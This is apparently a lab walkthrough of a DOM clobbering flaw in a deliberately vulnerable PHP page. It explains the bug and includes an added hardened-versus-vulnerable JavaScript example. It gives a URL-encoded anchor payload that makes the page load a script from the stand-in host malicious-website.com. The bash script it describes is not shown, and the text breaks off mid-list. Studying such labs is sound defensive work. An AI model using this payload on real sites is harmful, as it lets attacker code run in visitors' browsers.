Dom-Clobbering

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/dom-clobbering?ref_type=heads

Step 1: Understand the Vulnerability

  • The vulnerability lies in the fact that the name parameter from the URL is directly output to the HTML without proper sanitization.

  • This allows an attacker to manipulate the DOM by injecting elements with specific IDs and attributes that the JavaScript code will later use.
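The lookup pattern this page exploits, shown next to a hardened one, as an added example that is not code from the linked repository. In a browser, two anchors sharing id=someObject make window.someObject an HTMLCollection, its named property url resolves to the anchor carrying name=url, and an anchor stringifies to its href; Node has no DOM, so the clobbered global below is a constructed stand-in that reproduces only those two behaviours. The property names someObject and url follow the payload on this page; the script paths are assumptions.

```javascript
// Added example (not from the repository on this page): the vulnerable
// lookup pattern next to a hardened one. In the browser, two anchors sharing
// id=someObject make window.someObject an HTMLCollection; its named property
// "url" resolves to the anchor with name=url, and an anchor stringifies to
// its href. Node has no DOM, so clobberedStandIn below is a CONSTRUCTED
// stand-in that reproduces just those two behaviours.

// Vulnerable pattern: trusts whatever window.someObject happens to be.
function vulnerableScriptUrl(globalObj) {
  const someObject = globalObj.someObject || {};
  return String(someObject.url || "/assets/default.js");
}

// Hardened pattern: only accept a plain object holding a root-relative path.
function hardenedScriptUrl(globalObj) {
  const candidate = globalObj.someObject;
  const proto = candidate === null || typeof candidate !== "object"
    ? undefined
    : Object.getPrototypeOf(candidate);
  const isPlain = proto === Object.prototype || proto === null;
  if (!isPlain) return "/assets/default.js";        // DOM node or collection: clobbered
  const url = candidate.url;
  if (typeof url !== "string") return "/assets/default.js";
  // Reject absolute and protocol-relative URLs such as //malicious-website.com/...
  if (!/^\/(?!\/)[\w./-]*$/.test(url)) return "/assets/default.js";
  return url;
}

// Constructed stand-in for the global produced by the page's payload:
// <a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
class FakeHTMLCollection {}
const clobberedStandIn = new FakeHTMLCollection();
clobberedStandIn.url = { toString: () => "//malicious-website.com/malicious.js" };

const clobberedWindow = { someObject: clobberedStandIn };
const legitWindow = { someObject: { url: "/assets/app.js" } };   // assumed config
```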

Step 2: Create and Run the Bash Script

  1. Create the Bash Script: Create a file named run_dom.sh and add the provided Bash script to it.

Explanation of the Script:

  • echo $1 > _tmp/strip: This line only writes the script's first argument to a file; it does not affect the exploitation.

  • php -S 127.0.0.1:8080 -t dom-clobbering &: This starts PHP's built-in web server on 127.0.0.1:8080 in the background, serving files from the dom-clobbering directory.

  • This line uses the open command to open the specified URL in the default web browser.

  • The URL contains a specially crafted name parameter: %3Ca%20id=someObject%3E%3Ca%20id=someObject%20name=url%20href=//malicious-website.com/malicious.js%3E.

  • This URL-encoded string translates to: <a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>.

  • wait: This blocks until the background processes (the PHP server) exit.

  2. Make the Script Executable: Change the script's permissions to make it executable.

  3. Run the Script:

Expected Outcomes:

The expected outcome of exploiting the DOM clobbering vulnerability in the provided code is that a malicious script from //malicious-website.com/malicious.js will be loaded and executed in the context of the vulnerable web page. Here’s a detailed breakdown of what will happen:

  1. Malicious Script Injection:

    • The vulnerable web page receives the name parameter from the URL, which contains the crafted payload.

    • The HTML output will include the injected elements:
